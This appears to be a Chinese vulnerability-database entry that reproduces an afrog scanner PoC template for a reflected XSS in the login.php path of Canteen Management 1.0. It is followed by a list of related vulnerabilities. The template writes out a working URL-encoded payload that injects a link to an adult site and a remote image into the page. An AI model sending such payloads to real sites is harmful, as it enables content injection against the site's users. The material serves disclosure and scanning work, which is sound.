canteen-management-2022-xss: Canteen Management 1.0 2022 XSS Reflected

日期: 2025-09-01 | 影响软件: Canteen Management 1.0 | POC: 已公开

漏洞描述

Canteen-Management-1.0-2022 存在 XSS-Reflected 漏洞。任意提供的 URL 参数的名称被复制到封装在双引号中的 HTML 标记属性的值中。攻击者可以制作一个非常恶意的 HTTPS URL 重定向到一个非常恶意的 URL。

PoC代码[已公开]

id: canteen-management-2022-xss

info:
  name: Canteen Management 1.0 2022  XSS Reflected
  author: nu11secur1ty
  severity: medium
  verified: false
  description: Canteen-Management-1.0-2022 存在 XSS-Reflected 漏洞。任意提供的 URL 参数的名称被复制到封装在双引号中的 HTML 标记属性的值中。攻击者可以制作一个非常恶意的 HTTPS URL 重定向到一个非常恶意的 URL。
  reference:
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management

rules:
  r0:
    request:
      method: GET
      path: /login.php/lu555%22%3E%3Ca%20href=%22https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me
    expression: response.status == 200 && response.body.bcontains(b'action="/youthappam/login.php/lu555"') && response.body.bcontains(b'href="https:/pornhub.com/"')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/canteen-management-2022-xss.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

万户OA freemarkeService 远程命令执行漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC

万户OA freemarkeService 远程命令执行漏洞无POC